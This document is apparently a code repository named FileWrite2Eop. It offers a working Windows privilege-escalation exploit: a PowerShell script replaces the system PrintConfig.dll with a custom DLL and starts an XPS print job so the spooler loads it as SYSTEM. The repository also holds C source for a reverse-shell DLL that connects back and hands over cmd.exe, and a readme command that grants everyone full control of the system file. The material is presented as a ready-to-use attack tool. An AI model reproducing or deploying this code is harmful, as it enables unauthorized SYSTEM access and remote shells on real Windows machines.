├── FwEop2system.ps1
├── TriggerXPSPrint.cpp
├── TriggerXPSPrint.exe
├── fweop.jpg
├── readme.md
├── rev.dll
├── rev_64.dll
└── rev_dll.c


/FwEop2system.ps1:
--------------------------------------------------------------------------------
  1 | Copy-Item ".\rev_64.dll" -Destination "C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_e4ff50d4d5f8b2aa\Amd64\PrintConfig.dll" -Force
  2 | echo "[+] Spawnning SYSTEM shell sent to your Netcat ..."
  3 | $mycode = @"
  4 | using System;
  5 | using System.ComponentModel;
  6 | using System.IO;
  7 | using System.Runtime.InteropServices;
  8 | namespace XPS
  9 | {
 10 | public class XpsPrint
 11 | {
 12 | public static void StartPrintJob()
 13 | {
 14 | PrintJob("Microsoft XPS Document Writer", "myjob");
 15 | }
 16 | public static void PrintJob(string printerName, string jobName)
 17 | {
 18 | IntPtr completionEvent = CreateEvent(IntPtr.Zero, true, false, null);
 19 | if (completionEvent == IntPtr.Zero)
 20 | throw new Win32Exception();
 21 | try
 22 | {
 23 | IXpsPrintJob job;
 24 | IXpsPrintJobStream jobStream;
 25 | StartJob(printerName, jobName, completionEvent, out job, out jobStream);
 26 | jobStream.Close();
 27 | 
 28 | 
 29 | }
 30 | finally
 31 | {
 32 | if (completionEvent != IntPtr.Zero)
 33 | CloseHandle(completionEvent);
 34 | }
 35 | }
 36 | private static void StartJob(string printerName, string jobName, IntPtr completionEvent, out IXpsPrintJob job, out IXpsPrintJobStream jobStream)
 37 | {
 38 | int result = StartXpsPrintJob(printerName, jobName, null, IntPtr.Zero, completionEvent,
 39 | null, 0, out job, out jobStream, IntPtr.Zero);
 40 | 
 41 | }
 42 | [DllImport("XpsPrint.dll", EntryPoint = "StartXpsPrintJob")]
 43 | private static extern int StartXpsPrintJob(
 44 | [MarshalAs(UnmanagedType.LPWStr)] String printerName,
 45 | [MarshalAs(UnmanagedType.LPWStr)] String jobName,
 46 | [MarshalAs(UnmanagedType.LPWStr)] String outputFileName,
 47 | IntPtr progressEvent, 
 48 | IntPtr completionEvent, 
 49 | [MarshalAs(UnmanagedType.LPArray)] byte[] printablePagesOn,
 50 | UInt32 printablePagesOnCount,
 51 | out IXpsPrintJob xpsPrintJob,
 52 | out IXpsPrintJobStream documentStream,
 53 | IntPtr printTicketStream); 
 54 | [DllImport("Kernel32.dll", SetLastError = true)]
 55 | private static extern IntPtr CreateEvent(IntPtr lpEventAttributes, bool bManualReset, bool bInitialState, string lpName);
 56 | [DllImport("Kernel32.dll", SetLastError = true, ExactSpelling = true)]
 57 | private static extern WAIT_RESULT WaitForSingleObject(IntPtr handle, Int32 milliseconds);
 58 | [DllImport("Kernel32.dll", SetLastError = true)]
 59 | [return: MarshalAs(UnmanagedType.Bool)]
 60 | private static extern bool CloseHandle(IntPtr hObject);
 61 | }
 62 | [Guid("0C733A30-2A1C-11CE-ADE5-00AA0044773D")] 
 63 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 64 | interface IXpsPrintJobStream
 65 | {
 66 | void Read([MarshalAs(UnmanagedType.LPArray)] byte[] pv, uint cb, out uint pcbRead);
 67 | void Write([MarshalAs(UnmanagedType.LPArray)] byte[] pv, uint cb, out uint pcbWritten);
 68 | void Close();
 69 | }
 70 | [Guid("5ab89b06-8194-425f-ab3b-d7a96e350161")]
 71 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 72 | interface IXpsPrintJob
 73 | {
 74 | void Cancel();
 75 | void GetJobStatus(out XPS_JOB_STATUS jobStatus);
 76 | }
 77 | [StructLayout(LayoutKind.Sequential)]
 78 | struct XPS_JOB_STATUS
 79 | {
 80 | public UInt32 jobId;
 81 | public Int32 currentDocument;
 82 | public Int32 currentPage;
 83 | public Int32 currentPageTotal;
 84 | public XPS_JOB_COMPLETION completion;
 85 | public Int32 jobStatus; 
 86 | };
 87 | enum XPS_JOB_COMPLETION
 88 | {
 89 | XPS_JOB_IN_PROGRESS = 0,
 90 | XPS_JOB_COMPLETED = 1,
 91 | XPS_JOB_CANCELLED = 2,
 92 | XPS_JOB_FAILED = 3
 93 | }
 94 | enum WAIT_RESULT
 95 | {
 96 | WAIT_OBJECT_0 = 0,
 97 | WAIT_ABANDONED = 0x80,
 98 | WAIT_TIMEOUT = 0x102,
 99 | WAIT_FAILED = -1 
100 | }
101 | }
102 | 
103 | "@
104 | add-type -typeDefinition $mycode
105 | try { [XPS.XpsPrint]::StartPrintJob() }
106 | catch { "[+] You g0t SYSTEM !!!" }
107 | echo "[+] pwned !"
108 | echo ""
109 | exit
110 | 


--------------------------------------------------------------------------------
/TriggerXPSPrint.cpp:
--------------------------------------------------------------------------------
 1 | // Triggers the XPS printer by creating a print job - @OneLogicalMyth
 2 | // Compile with /MT
 3 | #include "stdafx.h"
 4 | #include <iostream>
 5 | #include <Windows.h>
 6 | #include <xpsobjectmodel.h>
 7 | #include <xpsprint.h>
 8 | using namespace std;
 9 | 
10 | #pragma comment(lib, "xpsprint.lib") 
11 | #pragma warning( disable : 4995 )
12 | int main()
13 | {
14 | 	CoInitialize(nullptr);
15 | 	IXpsOMObjectFactory *xpsFactory = NULL;
16 | 	CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast<LPVOID*>(&xpsFactory));
17 | 	HANDLE completionEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
18 | 	IXpsPrintJob *job = NULL;
19 | 	IXpsPrintJobStream *jobStream = NULL;
20 | 	StartXpsPrintJob(L"Microsoft XPS Document Writer", L"Print Job 1", NULL, NULL, completionEvent, NULL, 0, &job, &jobStream, NULL);
21 | 	jobStream->Close();
22 | 	CoUninitialize();
23 | }
24 | 


--------------------------------------------------------------------------------
/TriggerXPSPrint.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sailay1996/FileWrite2system/7c9f05bf46bc1b9a86ff7bbd7c4f7c7fcecb4d08/TriggerXPSPrint.exe


--------------------------------------------------------------------------------
/fweop.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sailay1996/FileWrite2system/7c9f05bf46bc1b9a86ff7bbd7c4f7c7fcecb4d08/fweop.jpg


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | ## FileWrite2Eop
 2 | 
 3 | ****File Write Weapon for Privilege Escalation To get SYSTEM****
 4 | 
 5 | ##### This technique release from [@SandboxEscaper](https://twitter.com/SandboxBear)'s ALPC Task Scheduler exploit and [@decoder_it](https://twitter.com/decoder_it) modified it simple as powershell script.
 6 | 
 7 | 
 8 | *For Testing Without fileWrite Bug (Privilege Require)*
 9 | 
10 | `C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_e4ff50d4d5f8b2aa\Amd64>cacls PrintConfig.dll /e /g everyone:f`
11 | 
12 | <br>
13 | 
14 | REF: https://decoder.cloud/2019/11/13/from-arbitrary-file-overwrite-to-system/
15 | 
16 | 
17 | 
18 | ![eop](https://github.com/sailay1996/FileWrite2system/blob/master/fweop.jpg)
19 | 
20 | [@404death](https://twitter.com/404death)
21 | 


--------------------------------------------------------------------------------
/rev.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sailay1996/FileWrite2system/7c9f05bf46bc1b9a86ff7bbd7c4f7c7fcecb4d08/rev.dll


--------------------------------------------------------------------------------
/rev_64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sailay1996/FileWrite2system/7c9f05bf46bc1b9a86ff7bbd7c4f7c7fcecb4d08/rev_64.dll


--------------------------------------------------------------------------------
/rev_dll.c:
--------------------------------------------------------------------------------
 1 | /* Windows Reverse Shell                           
 2 |       gcc -c reverse_dll.c
 3 |       gcc -shared -o reverse_dll.dll reverse_dll.o -lws2_32
 4 | */                                                      
 5 | 
 6 | #define REVERSEIP "127.0.0.1"
 7 | #define REVERSEPORT 1337
 8 | 
 9 | #include <winsock2.h>
10 | #include <stdio.h>   
11 | 
12 | #pragma comment(lib,"ws2_32")
13 | 
14 |   WSADATA wsaData;
15 |   SOCKET Winsock; 
16 |   SOCKET Sock;    
17 |   struct sockaddr_in hax;
18 |                          
19 |   STARTUPINFO ini_processo;
20 |   PROCESS_INFORMATION processo_info;
21 | 
22 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
23 | {                               
24 |     WSAStartup(MAKEWORD(2,2), &wsaData);
25 |     Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
26 |                                                                                                                                                                                                    
27 |     hax.sin_family = AF_INET;                                                                     
28 |     hax.sin_port =  htons(REVERSEPORT);
29 |     hax.sin_addr.s_addr = inet_addr(REVERSEIP);                                                     
30 | 
31 |     WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL);
32 | 
33 |     memset(&ini_processo,0,sizeof(ini_processo));
34 |     ini_processo.cb=sizeof(ini_processo);        
35 |     ini_processo.dwFlags=STARTF_USESTDHANDLES;   
36 |     ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
37 |                                                                                                 
38 |     CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info);      
39 |     return TRUE;
40 | }
41 | 


--------------------------------------------------------------------------------